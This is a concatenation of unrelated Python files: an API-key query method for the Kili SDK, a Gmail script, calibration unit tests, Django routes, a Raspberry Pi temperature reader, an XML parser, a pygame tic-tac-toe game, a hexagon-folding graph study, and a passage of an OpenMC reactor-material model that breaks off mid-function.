Number of assets to skip (they are ordered by their date of creation, first to last).
fields :
All the fields to request among the possible fields for the assets.
See [the documentation](https://cloud.kili-technology.com/docs/python-graphql-api/graphql-api/#apikey) for all possible fields.
first :
Maximum number of assets to return.
disable_tqdm :
If True, the progress bar will be disabled
as_generator:
If True, a generator on the API key is returned.
Returns
-------
result:
a result object which contains the query if it was successful, or an error message else.
Examples
-------
>>> kili.api_keys(user_id=user_id)
>>> kili.api_keys(api_key=api_key)
>>> kili.api_keys(api_key=api_key, as_generator=False)
"""
saved_args = locals()
count_args = {
k: v
for (k, v) in saved_args.items()
if k
in [
'user_id',
'api_key_id',
'api_key'
]
}
disable_tqdm = disable_tqdm or as_generator
payload_query = {
'where': {
'user': {
'id': user_id,
'apiKey': api_key
},
'id': api_key_id,
},
}
api_keys_generator = row_generator_from_paginated_calls(
skip,
first,
self.count_api_keys,
count_args,
self._query_api_keys,
payload_query,
fields,
disable_tqdm
)
if as_generator:
return api_keys_generator
return list(api_keys_generator)
def _query_api_keys(self,
skip: int,
first: int,
payload: dict,
fields: List[str]):
payload.update({'skip': skip, 'first': first})
_gql_api_keys = gql_api_keys(fragment_builder(fields, ApiKeyType))
result = self.auth.client.execute(_gql_api_keys, payload)
return format_result('data', result)
@Compatible(['v2'])
@typechecked
def count_api_keys(self, api_key_id: Optional[str] = None, user_id: Optional[str] = None,
api_key: Optional[str] = None) -> int:
"""
Count and return the number of api keys with the given constraints
Parameters
----------
api_key_id :
The unique id of the api key to retrieve.
user_id :
Identifier of the user (you can only query your own api keys).
api_key :
Value of the api key (you can only query your own api keys).
Returns
-------
dict
A result object which contains the query if it was successful, or an error message else.
Examples
-------
>>> kili.count_api_keys(user_id=user_id)
3
>>> kili.count_api_keys(api_key=api_key)
1
"""
variables = {
'where': {
'user': {
'id': user_id,
'apiKey': api_key
},
'id': api_key_id,
},
}
result = self.auth.client.execute(GQL_API_KEYS_COUNT, variables)
count = format_result('data', result)
return count
|
import json
# client = gmail_client.get_gmail_client(config.CLIENT_SECRET_FILE_PATH, config.SCOPES, secret.APPLICATION_NAME)
# # # ids = gmail_handling.get_unread_email_ids(client)
# # # messages = [client.users().messages().get(userId='me', id=i).execute() for i in ids]
# # # j = json.dumps(messages)
# # # with open('temp_file.json', 'w') as f:
# # # f.write(j)
# #
# #
# response = client.users().messages().list(userId='me').execute()
# messages = []
# messages.extend(response['messages'])
#
# while 'nextPageToken' in response:
# page_token = response['nextPageToken']
# response = client.users().messages().list(userId='me', pageToken=page_token).execute()
# messages.extend(response['messages'])
#
# with open('temp_file.json', 'w') as f:
# f.write(json.dumps(messages))
#
#
#
# #
# def get_emails(client, email_ids):
# return [client.users().messages().get(userId='me', id=this_id).execute() for this_id in email_ids]
#
# with open('temp_file.json', 'r') as f:
# # all_m = json.loads(f.read())
# # gillians_thread = [thing for thing in all_m if thing['threadId'] == ''
# ids = [thing['id'] for thing in json.loads(f.read())]
#
# messages = get_emails(client, ids)
# with open('temp_file2.json', 'w') as f:
# f.write(json.dumps(messages))
with open('temp_file2.json', 'r') as f:
emails = json.loads()
# response = client.users().messages().list(userId='me', q="from:al.avery.dev@gmail.com is:unread").execute()
# print(response)
# print(client.users().messages().get(userId='me', id='1608142e27795680').execute())
|
from python_framework import Enum, EnumItem
@Enum(associateReturnsTo='number')
class WeekDayEnumeration :
MONDAY = EnumItem(number=0, short='mon')
TUESDAY = EnumItem(number=1, short='tue')
WEDNESDAY = EnumItem(number=2, short='wed')
THURSDAY = EnumItem(number=3, short='thu')
FRIDAY = EnumItem(number=4, short='fri')
SATURDAY = EnumItem(number=5, short='sat')
SUNDAY = EnumItem(number=6, short='sun')
WeekDay = WeekDayEnumeration()
|
import os
from unittest.mock import patch
import numpy as np
import pandas as pd
from numpy.testing import assert_allclose, assert_almost_equal
from autumn.core import db
from autumn.calibration import Calibration, CalibrationMode
from autumn.calibration.utils import (
sample_starting_params_from_lhs,
specify_missing_prior_params,
)
from tests.utils import get_mock_model
def test_sample_starting_params_from_lhs__with_lognormal_prior_and_one_sample():
priors = [
{
"param_name": "ice_cream_sales",
"distribution": "lognormal",
"distri_params": [-1, 1],
}
]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=1)
assert_almost_equal(params[0]['ice_cream_sales'], 0.36787944117144233)
def test_sample_starting_params_from_lhs__with_beta_prior_and_one_sample():
priors = [
{
"param_name": "ice_cream_sales",
"distribution": "beta",
"distri_mean": 0.05,
"distri_ci": [0.01, 0.1],
}
]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=1)
assert_almost_equal(params[0]['ice_cream_sales'], 0.04680260472064115)
def test_sample_starting_params_from_lhs__with_gamma_prior_and_one_sample():
priors = [
{
"param_name": "ice_cream_sales",
"distribution": "gamma",
"distri_mean": 5.0,
"distri_ci": [3.0, 7.0],
}
]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=1)
assert_almost_equal(params[0]['ice_cream_sales'], 4.932833078981056)
def test_sample_starting_params_from_lhs__with_uniform_prior_and_one_sample():
priors = [{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=1)
assert _prepare_params(params) == _prepare_params([{"ice_cream_sales": 3.0}])
def test_sample_starting_params_from_lhs__with_uniform_priors_and_one_sample():
priors = [
{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]},
{"param_name": "air_temp", "distribution": "uniform", "distri_params": [1, 10]},
]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=1)
assert _prepare_params(params) == _prepare_params([{"ice_cream_sales": 3.0, "air_temp": 5.5}])
def test_sample_starting_params_from_lhs__with_uniform_prior_and_two_samples():
priors = [{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=2)
assert _prepare_params(params) == _prepare_params(
[{"ice_cream_sales": 2.0}, {"ice_cream_sales": 4.0}]
)
def test_sample_starting_params_from_lhs__with_uniform_priors_and_two_samples():
priors = [
{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]},
{"param_name": "air_temp", "distribution": "uniform", "distri_params": [1, 10]},
]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=2)
assert _prepare_params(params) == _prepare_params(
[{"ice_cream_sales": 2.0, "air_temp": 3.25}, {"ice_cream_sales": 4.0, "air_temp": 7.75}],
) or _prepare_params(params) == _prepare_params(
[{"ice_cream_sales": 4.0, "air_temp": 3.25}, {"ice_cream_sales": 2.0, "air_temp": 7.75}],
)
def test_sample_starting_params_from_lhs__with_uniform_prior_and_four_samples():
priors = [{"param_name": "ice_cream_sales", "distribution": "uniform", "distri_params": [1, 5]}]
specify_missing_prior_params(priors)
params = sample_starting_params_from_lhs(priors, n_samples=4)
assert _prepare_params(params) == _prepare_params(
[
{"ice_cream_sales": 1.5},
{"ice_cream_sales": 2.5},
{"ice_cream_sales": 3.5},
{"ice_cream_sales": 4.5},
],
)
def _prepare_params(l):
return set([tuple(sorted(ps.items())) for ps in l])
from autumn.calibration.priors import UniformPrior
from autumn.calibration.targets import PoissonTarget
from autumn.core.project import Project, ParameterSet, Params
def test_calibrate_autumn_mcmc(temp_data_dir):
priors = [UniformPrior("ice_cream_sales", [1, 5])]
target_outputs = [
PoissonTarget(
pd.Series(
[3, 6, 9, 12, 15], [2000, 2001, 2002, 2003, 2004], name="shark_attacks"
)
),
]
calib = Calibration(priors, target_outputs, seed=0)
calib._no_pickle = True
params = ParameterSet(Params({"ice_cream_sales": 0, "time": {"start": 2000}}))
project = Project("hawaii", "sharks", _build_mock_model, params, calib)
calib.run(project, 1, 1, 1)
app_dir = os.path.join(temp_data_dir, "outputs", "calibrate", "sharks", "hawaii")
run_dir = os.path.join(app_dir, os.listdir(app_dir)[0])
db_paths = db.load.find_db_paths(run_dir)
assert len(db_paths) == 1
out_db = db.get_database(db_paths[0])
assert set(out_db.table_names()) == {
"derived_outputs",
"mcmc_run",
"mcmc_params",
}
mcmc_runs = out_db.query("mcmc_run")
mcmc_params = out_db.query("mcmc_params")
mle_params = db.process.find_mle_params(mcmc_runs, mcmc_params)
ice_cream_sales_mle = mle_params["ice_cream_sales"]
# +++FIXME Should be deterministic now
assert 2.9 < ice_cream_sales_mle < 3.1
def _build_mock_model(params, build_options=None):
"""
Fake model building function where derived output "shark_attacks"
is influenced by the ice_cream_sales input parameter.
"""
ice_cream_sales = params["ice_cream_sales"]
vals = [0, 1, 2, 3, 4, 5]
mock_model = get_mock_model(
times=np.array([1999, 2000, 2001, 2002, 2003, 2004]),
outputs=[
[300.0, 300.0, 300.0, 33.0, 33.0, 33.0, 93.0, 39.0],
[271.0, 300.0, 271.0, 62.0, 33.0, 62.0, 93.0, 69.0],
[246.0, 300.0, 246.0, 88.0, 33.0, 88.0, 93.0, 89.0],
[222.0, 300.0, 222.0, 111.0, 33.0, 111.0, 39.0, 119.0],
[201.0, 300.0, 201.0, 132.0, 33.0, 132.0, 39.0, 139.0],
[182.0, 300.0, 182.0, 151.0, 33.0, 151.0, 39.0, 159.0],
],
derived_outputs={
"shark_attacks": np.array([ice_cream_sales * i for i in vals]),
},
)
return mock_model
|
from django.conf.urls import url
from api import views
from django.conf.urls.static import static
from django.conf import settings
from rest_framework_jwt.views import obtain_jwt_token
urlpatterns = [
url(r'^department/$', views.DepartmentAPIClassView.departmentApi),
url(r'^department/([0-9]+)$', views.DepartmentAPIClassView.departmentApi),
url(r'^employee/$', views.EmployeeAPIClassView.employeeApi),
url(r'^employee/([0-9]+)$', views.EmployeeAPIClassView.employeeApi),
url(r'^SaveFile$', views.SaveFile),
url(r'^login/$', obtain_jwt_token),
url(r'^student/$', views.studentApi),
url(r'^student/([0-9]+)$', views.studentApi),
url(r'^course/$', views.courseApi),
url(r'^course/([0-9]+)$', views.courseApi)
] + static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) |
import os
import glob
import time
os.system('modprobe w1-gpio') # turns on GPIO module
os.system('modprobe w1-therm') # Turns on temperature module
# Finds Device File that holds Temperature Data
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
#Function that reads sensor data
def read_temp_raw():
f = open(device_file,'r') #Opens the temperature device file
lines = f.readlines() #Returns text
f.close()
return lines
#Convert the value of the sensor into a temerature
def read_temp():
lines = read_temp_raw() #reading temperature 'device file'
#While the first line does not contain ''YES', wait for
#0.2s then read the device file again
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
#Look for the position of the '=' in the second line of the
#device file
equals_pos = lines[1].find('t=')
# If the '=' is foumd, convert the rest of the line after the
# '=' into degrees celsius then degrees fahrenheit
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
temp_c = float(temp_string)/ 1000.0
temp_f = temp_c*9.0/5.0+32.0
return temp_c, temp_f
while True:
print(read_temp())
time.sleep(1) |
# -*- coding: utf-8 -*-
from xml.etree import ElementTree
class XMLParser():
'''
This class is responsable to extract informations from a xml file representing a data base structure
with some data (optional)
@filename xml file name
'''
def __init__(self, fileName):
self.file = fileName
self.databaseName = ""
self.rows = list()
self.tables = list()
'''
Load and store the xml tree structure
'''
def parse(self):
with open(self.file, 'rt') as f:
self.tree = ElementTree.parse(f)
'''
Used to generate a structure with table and data informations to be processed and inserted
'''
def generate(self):
self.databaseName = self.tree.getroot().attrib["name"]
if self.tree:
# tables data to be used in tables creation
tables = list()
# rows data to be inserted after tables creation
rows = list()
for table in self.tree.findall('.//table'):
t = dict()
table_info = table.attrib
# add table name
t["name"] = table_info["name"]
# add table dependecies if it has one
if "dependencies" in table_info:
t["dependencies"] = table_info["dependencies"].split()
column_data = list()
row_number = 0
for column in table.findall(".//column"):
c = dict()
column_info = column.attrib
c["name"] = column_info["name"]
c["type"] = column_info["type"]
if "reference" in column_info:
c["reference"] = column_info["reference"]
column_data.append(c)
#
row_number = 0
for row in column.findall(".//row"):
r = dict() # row info
r["tablename"] = table_info["name"]
r["columnname"] = column_info["name"]
r["columndata"] = row.text
r["rownumber"] = row_number
rows.append(r)
row_number = row_number + 1
# add rows
t["columns"] = column_data
tables.append(t)
self.tables = tables
self.rows = rows
# # DEBUG
# print "Tables"
# for t in tables:
# print t
# print "Data"
# for r in rows:
# print r
def getTablesInfo(self):
return self.tables
def getTablesData(self):
return self.rows
def getDatabaseName(self):
return self.databaseName
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import pygame
pygame.init()
screen = pygame.display.set_mode((550, 550))
pygame.display.set_caption('Tic-Tac-Toe')
first = pygame.draw.rect(screen, (255, 255, 255), (25, 25, 150, 150))
second = pygame.draw.rect(screen, (255, 255, 255), (200, 25, 150, 150))
third = pygame.draw.rect(screen, (255, 255, 255), (375, 25, 150, 150))
fourth = pygame.draw.rect(screen, (255, 255, 255), (25, 200, 150, 150))
fifth = pygame.draw.rect(screen, (255, 255, 255), (200,200,150,150))
sixth = pygame.draw.rect(screen, (255, 255, 255), (375,200,150,150))
seventh = pygame.draw.rect(screen, (255, 255, 255), (25, 375, 150, 150))
eighth = pygame.draw.rect(screen, (255, 255, 255), (200, 375, 150, 150))
ninth = pygame.draw.rect(screen, (255, 255, 255), (375, 375, 150, 150))
rect_won = pygame.image.load('rect won.png')
circle_won = pygame.image.load('circle won.png')
draw = pygame.image.load('draw.png')
running = True
draw_object = 'rect'
al_p = True
sal_p = True
tal_p = True
foal_p = True
fial_p = True
sial_p = True
seal_p = True
eal_p = True
nal_p = True
li = [' ' for i in range(9)]
var = ''
def checkresult(li):
global var
count=0
for g in li:
if(g=='X'):
count+=1
elif(g=='O'):
count-=1
if(abs(count)<2):
bool=False
ec=False
if(li[0]==li[1]==li[2]!=' '):
bool=True
var = li[0]
elif(li[3]==li[4]==li[5]!=' '):
bool=True
var = li[3]
elif(li[6]==li[7]==li[8]!=' '):
var = li[6]
bool=True
elif(li[0]==li[3]==li[6]!=' '):
var = li[0]
bool=True
elif(li[1]==li[4]==li[7]!=' '):
bool=True
var = li[1]
elif(li[2]==li[5]==li[8]!=' '):
var = li[2]
bool=True
elif(li[0]==li[4]==li[8]!=' ' or li[2]==li[4]==li[6]!=' '):
var = li[4]
bool=True
if bool==False :
for i in li:
acount=0
if i == "X" or i=="O":
continue
break
else:
var = 'Draw'
bool=True
return var
while running:
pygame.time.delay(300)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
screen.fill((0, 0, 0))
li = [' ' for i in range(9)]
draw_object = 'rect'
var = ''
al_p = True
sal_p = True
tal_p = True
foal_p = True
fial_p = True
sial_p = True
seal_p = True
eal_p = True
nal_p = True
first = pygame.draw.rect(screen, (255, 255, 255), (25, 25, 150, 150))
second = pygame.draw.rect(screen, (255, 255, 255), (200, 25, 150, 150))
third = pygame.draw.rect(screen, (255, 255, 255), (375, 25, 150, 150))
fourth = pygame.draw.rect(screen, (255, 255, 255), (25, 200, 150, 150))
fifth = pygame.draw.rect(screen, (255, 255, 255), (200, 200, 150, 150))
sixth = pygame.draw.rect(screen, (255, 255, 255), (375, 200,150, 150))
seventh = pygame.draw.rect(screen, (255, 255, 255), (25, 375,150, 150))
eighth = pygame.draw.rect(screen, (255, 255, 255), (200, 375,150, 150))
ninth = pygame.draw.rect(screen, (255, 255, 255), (375, 375,150, 150))
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
if first.collidepoint(pos) and al_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (50, 50, 100, 100))
draw_object = 'c'
li[0] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (100, 100), 50)
draw_object = 'rect'
li[0] = 'O'
al_p = False
if second.collidepoint(pos) and sal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (225, 50, 100, 100))
draw_object = 'c'
li[1] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (275, 100), 50)
draw_object = 'rect'
li[1] = 'O'
sal_p = False
if third.collidepoint(pos) and tal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (400, 50, 100, 100))
draw_object = 'c'
li[2] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (450, 100), 50)
draw_object = 'rect'
li[2] = 'O'
tal_p = False
if fourth.collidepoint(pos) and foal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (50, 225, 100, 100))
draw_object = 'c'
li[3] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (100, 275), 50)
draw_object = 'rect'
li[3] = 'O'
foal_p = False
if fifth.collidepoint(pos) and fial_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (225, 225, 100,100))
draw_object = 'c'
li[4] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (275, 275), 50)
draw_object = 'rect'
li[4] = 'O'
fial_p = False
if sixth.collidepoint(pos) and sial_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (400, 225, 100,100))
draw_object = 'c'
li[5] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (450, 275), 50)
draw_object = 'rect'
li[5] = 'O'
sial_p = False
if seventh.collidepoint(pos) and seal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (50, 400, 100, 100))
draw_object = 'c'
li[6] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (100, 450), 50)
draw_object = 'rect'
li[6] = 'O'
seal_p = False
if eighth.collidepoint(pos) and eal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (225, 400, 100,100))
draw_object = 'c'
li[7] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (275, 450), 50)
draw_object = 'rect'
li[7] = 'O'
eal_p = False
if ninth.collidepoint(pos) and nal_p:
if draw_object == 'rect':
pygame.draw.rect(screen, (255, 0, 0), (400, 400, 100,100))
draw_object = 'c'
li[8] = 'X'
else:
pygame.draw.circle(screen, (0,255,0), (450, 450), 50)
draw_object = 'rect'
li[8] = 'O'
nal_p = False
b=checkresult(li)
if b:
if var == 'X':
screen.fill((255,0,0))
screen.blit(rect_won, (101, 184))
elif var == "O":
screen.fill((0,255,0))
screen.blit(circle_won, (115, 114))
else:
screen.fill((255,255,255))
screen.blit(draw, (159, 216))
b = False
pygame.display.update()
|
from queue import Queue
from typing import List, Any
from networkx.algorithms import bipartite, distance_measures, approximation, cycles
from tabulate import tabulate
import networkx as nx
import scipy.linalg as la
from matplotlib import pyplot as plt
import networkx.linalg.spectrum as spec
import numpy as np
from pylab import rcParams
from networkx.drawing.nx_agraph import to_agraph
import graph_generation
# CONSIDER ROTATION
from sys import maxsize as INT_MAX
from collections import deque
N = 100200
gr = [0] * N
for i in range(N):
gr[i] = []
# Function to add edge
def add_edge(x: int, y: int) -> None:
global gr
gr[x].append(y)
gr[y].append(x)
# Function to find the length of
# the shortest cycle in the graph
def shortest_cycle(n: int) -> int:
# To store length of the shortest cycle
global gr
ans = INT_MAX
# For all vertices
for i in range(n):
# Make distance maximum
dist = [int(1e9)] * n
# Take a imaginary parent
par = [-1] * n
# Distance of source to source is 0
dist[i] = 0
q = deque()
# Push the source element
q.append(i)
# Continue until queue is not empty
while q:
# Take the first element
x = q[0]
q.popleft()
# Traverse for all it's childs
for child in gr[x]:
# If it is not visited yet
if dist[child] == int(1e9):
# Increase distance by 1
dist[child] = 1 + dist[x]
# Change parent
par[child] = x
# Push into the queue
q.append(child)
# If it is already visited
elif par[x] != child and par[child] != x:
ans = min(ans, dist[x] +
dist[child] + 1)
# If graph contains no cycle
#clean gr
gr = [0] * N
for i in range(N):
gr[i] = []
if ans == INT_MAX:
return -1
# If graph contains cycle
else:
return ans
from collections import Counter
def countDistinct(arr):
# counter method gives dictionary of elements in list
# with their corresponding frequency.
# using keys() method of dictionary data structure
# we can count distinct values in array
return len(Counter(arr).keys())
class Hexagon:
neighbor_hexagons: List[Any]
def __init__(self, p: int, label: int, init_list: list = [],real_list:list = []) -> object:
"""
:type init_list: object
"""
self.p = p
self.label = label
self.fold_angles = init_list
self.real_angles = real_list
self.neighbors = []
self.neighbor_hexagons = []
self.generated = False
def neighbor_gen(self):
global vertex_num
global vertex_dict
if not self.generated:
self.generated = True
for i in range(6):
if self.fold_angles[i] > 0:
d = self.real_angles.copy()
i_l = (i - 1) % 6
i_r = (i + 1) % 6
d[i_l] = d[i_l] + 2 * d[i]
d[i_r] = d[i_r] + 2 * d[i]
d[i] = -d[i]
c = self.fold_angles.copy()
c[i_l] = d[i_l] % self.p
c[i_r] = d[i_r] % self.p
c[i] = d[i] % self.p
# update in the vertex_dict
k = [key for key, val in vertex_dict.items() if
val.fold_angles == c] # vertex_dict: {vertex_num: hexagon}
if len(k) != 0:
if k[0] not in self.neighbors:
self.neighbors.append(k[0]) # int
self.neighbor_hexagons.append(vertex_dict[k[0]]) # Hexagon
else: # create a new hexagon vertex
vertex_num = vertex_num + 1
h = Hexagon(p, vertex_num, init_list=c,real_list=d)
vertex_dict[vertex_num] = h
self.neighbors.append(vertex_num)
self.neighbor_hexagons.append(h)
return self.neighbor_hexagons
def hexagon_img(self):
g = nx.generators.lattice.hexagonal_lattice_graph(1, 1)
angle_dict = {i: self.fold_angles[i] for i in range(6)}
g_1 = nx.relabel_nodes(g, angle_dict)
nx.draw(g_1)
plt.savefig("start_point.png") # save as png
plt.show() # display
if __name__ == '__main__':
f = open("output2.txt", "a")
info_list = []
p_list = [7]
#desired_list = [129,2,5,7,10,77,20,53,29]
graph_list = []
for i in range(1,2):
vertex_dict = {}
p = 7 # modulo
vertex_num = 0
diG = nx.DiGraph()
G = nx.Graph()
sim_G = nx.DiGraph()
start_list = [0, 1, 0, 0, 1, 0]
start_list = [k * i for k in start_list]
start_point = Hexagon(p, vertex_num, start_list, start_list)
# start_point.hexagon_img()
vertex_dict[vertex_num] = start_point
q = Queue()
q.put(start_point)
while not q.empty():
t = q.get()
neighbors_generated = t.neighbor_gen()
for n in neighbors_generated:
if not n.generated:
q.put(n)
for k in vertex_dict:
"""
if k < 35:
sim_G.add_node(k)
for n in vertex_dict[k].neighbors:
if 35 > n and n > k:
sim_G.add_edge(k, n)
"""
diG.add_node(k)
G.add_node(k)
for n in vertex_dict[k].neighbors:
assert isinstance(n, int)
diG.add_edge(k, n)
if n > k:
G.add_edge(k,n)
#generate gradient map
d = {}
for k in vertex_dict: #nodes index
if k == 0:
d[k] = 0
else:
#find the nearest neighbor
n = min(vertex_dict[k].neighbors)
d[k] = d[n]+1
"""
for v in d:
if v in desired_list:
print("index")
print(v)
print("distance")
print(d[v])
#H = nx.relabel_nodes(G, vertex_dict)
low, *_, high = sorted(d.values())
norm = mpl.colors.Normalize(vmin=low, vmax=high, clip=True)
mapper = mpl.cm.ScalarMappable(norm=norm, cmap=mpl.cm.coolwarm)
try:
nx.draw_planar(G,nodelist=d,
node_size=1000,
node_color=[mapper.to_rgba(i)
for i in d.values()],
with_labels=True,
font_color='white') # only works if the graph is planar
except Exception:
nx.draw(G,
nodelist=d,
node_size=1000,
node_color=[mapper.to_rgba(i)
for i in d.values()],
with_labels=True,
font_color='white')
#plt.savefig("gradient_modulo_" + str(p) + ".png") # save as png
#plt.show()
# a better way to draw?
render = to_agraph(sim_G) # this is using graphviz. Graphviz worked better than matplotlib in this case.
render.layout('twopi') # this is only one of the possible layouts, I will comment on this on WeChat
# other possible layouts: http://www.adp-gmbh.ch/misc/tools/graphviz/index.html
render.graph_attr['label'] = "modulo_" + "p_render"
render.draw('twopi_modulo_{}.png'.format(p))
#
# print(G.nodes)
# print(G.edges)
# plt.savefig("gradient_modulo_" + str(p) + ".png") # save as png
A = to_agraph(sim_G)
A.layout('dot')
A.draw('dot_multi_'+ str(p)+'.png')
A = nx.to_numpy_matrix(G)
#print(A)
eigvals, eigvecs = la.eig(A)
eigvals = eigvals.real
eigvals.sort()
distinct_eigval_num = countDistinct(eigvals)
first = eigvals[-1]
second = eigvals[-2]
#spec.adjacency_spectrum(G)
cycle_9_list = []
girth_dict = {}
girth_len_dict = {}
for c in cycles.minimum_cycle_basis(G):
if len(c) == 9:
cycle_9_list.append(c)
if len(c) not in girth_dict.keys():
girth_dict[len(c)] = c
girth_len_dict[len(c)] = 1
else:
girth_len_dict[len(c)] = girth_len_dict[len(c)] + 1
print(f"\n for starting point {i}", file=f)
print(f"girth_len_dict:{girth_len_dict}", file=f)
print(f"cycle_9_list: {cycle_9_list}", file=f )
for cycle_9 in cycle_9_list:
for v in cycle_9:
print("index:" + str(v), file=f)
print(f'[!]fold_angles: {vertex_dict[v].fold_angles}', file=f)
print(f"[@]real_angles:{vertex_dict[v].real_angles}", file=f)
print(f"neighbors:{vertex_dict[v].neighbors}", file=f)
print(f"distance:{d[v]}\n", file=f)
#n = vertex_num + 1
"""
cycle_9_list = [[129, 2, 5, 7, 10, 77, 20, 53, 29], [1, 3, 4, 39, 104, 8, 14, 22, 58]]
distance_iso_dict = {}
for s in range(1, 7):
print(s)
print(f"\n##########with starting point {s} #######", file=f)
for cycle_9 in cycle_9_list:
print(f"cycle: {cycle_9}", file=f)
for v in cycle_9:
if s != 1:
#do the convert
fold_algs = vertex_dict[v].fold_angles
iso_fold_algs = [(alg * s) % 7 for alg in fold_algs]
#check the related distance
for k in vertex_dict:
if vertex_dict[k].fold_angles == iso_fold_algs:
print("index:" + str(k), file=f)
print(f'[!]fold_angles: {vertex_dict[k].fold_angles}', file=f)
print(f"[@]real_angles:{vertex_dict[k].real_angles}", file=f)
print(f"neighbors:{vertex_dict[k].neighbors}", file=f)
print(f"distance:{d[k]}\n", file=f)
distance_iso_dict[v].append(d[k])
else:
distance_iso_dict[v] = [d[v]]
print("index:" + str(v), file=f)
print(f'[!]fold_angles: {vertex_dict[v].fold_angles}', file=f)
print(f"[@]real_angles:{vertex_dict[v].real_angles}", file=f)
print(f"neighbors:{vertex_dict[v].neighbors}", file=f)
print(f"distance:{d[v]}\n", file=f)
"""
for key in distance_iso_dict:
print(f"{key}'s distances: {distance_iso_dict[key]}", file=f)
f.close()
"""
#print(len(vertex_dict))
#girth = shortest_cycle(n)/2
#info = [p, distinct_eigval_num, first, second]
#info = [p, n, girth_dict, girth_len_dict]
#info = [p, n, bipartite.is_bipartite(G), distance_measures.diameter(G), girth , first, second]
#info_list.append(info)
#f.close()
#print(tabulate(info_list,headers = ["p","# of dictinct eigenvalues","first","second"]))
#print(tabulate(info_list, headers=["p", "vertex number", "is bipartite", "diameter", "girth", "largest eigenval", "2nd largest eigenval"]))
#print(tabulate(info_list, headers=["p", "vertex number", "girth list","girth length dict"])) |
import openmc
from numpy import pi
# Constants
T_r1 = 2135e-5
T_r2 = 3135e-5
T_r3 = 3485e-5
T_r4 = 3835e-5
T_r5 = 4235e-5
T_pitch = 0.09266
uoc_9 = openmc.Material()
uoc_9.set_density("g/cc", 11)
uoc_9.add_nuclide("U235", 2.27325e-3)
uoc_9.add_nuclide("U238", 2.269476e-2)
uoc_9.add_nuclide("O16", 3.561871e-2)
uoc_9.add_nuclide("C0", 9.79714e-3)
uoc_9.temperature = 1110
uoc_9.volume = 4 / 3 * pi * (T_r1 ** 3) * 101 * 210 * 4 * 36
por_c = openmc.Material()
por_c.set_density("g/cc", 1)
por_c.add_nuclide("C0", 5.013980e-2)
por_c.temperature = 948
si_c = openmc.Material()
si_c.set_density("g/cc", 3.2)
si_c.add_nuclide("Si28", 4.431240e-2)
si_c.add_nuclide("Si29", 2.25887e-3)
si_c.add_nuclide("Si30", 1.48990e-3)
si_c.add_nuclide("C0", 4.806117e-2)
si_c.temperature = 948
graphite = openmc.Material()
graphite.set_density("g/cc", 1.8)
graphite.add_nuclide("C0", 9.025164e-2)
graphite.temperature = 948
triso_4_layers = openmc.Material()
triso_4_layers.add_nuclide("C0", 0.06851594519357823)
triso_4_layers.add_nuclide("Si28", 0.009418744960032735)
triso_4_layers.add_nuclide("Si29", 0.00048013017638108395)
triso_4_layers.add_nuclide("Si30", 0.0003166830980933728)
triso_4_layers.set_density("sum")
triso_4_layers.temperature = 948
lm_graphite = openmc.Material()
lm_graphite.set_density("g/cc", 1.8)
lm_graphite.add_nuclide("C0", 9.025164e-2)
lm_graphite.temperature = 948
flibe = openmc.Material()
flibe.set_density("g/cc", 1.95)
flibe.add_nuclide("Li6", 1.383014e-6)
flibe.add_nuclide("Li7", 2.37132e-2)
flibe.add_nuclide("Be9", 1.18573e-2)
flibe.add_nuclide("F19", 4.74291e-2)
flibe.temperature = 948
mats = openmc.Materials(
(uoc_9, por_c, si_c, graphite, lm_graphite, flibe, triso_4_layers)
)
# 4 layer triso
two_spheres = [openmc.Sphere(r=r) for r in [T_r1, T_r5]]
two_triso_cells = [
openmc.Cell(fill=uoc_9, region=-two_spheres[0]),
openmc.Cell(fill=triso_4_layers, region=+two_spheres[0] & -two_spheres[1]),
openmc.Cell(fill=lm_graphite, region=+two_spheres[1]),
]
two_triso_univ = openmc.Universe(cells=two_triso_cells)
def create_prism(left, right, left_refl, right_refl):
if left_refl:
xplane_left = +openmc.XPlane(x0=left, boundary_type="reflective")
else:
xplane_left = +openmc.XPlane(x0=left)
if right_refl:
xplane_right = -openmc.XPlane(x0=right, boundary_type="reflective")
else:
xplane_right = -openmc.XPlane(x0=right)
prism = (
xplane_left &
xplane_right &
+openmc.YPlane(y0=0.35) &
-openmc.YPlane(y0=0.35 + 2.55) &
+openmc.ZPlane(z0=0, boundary_type="reflective") &
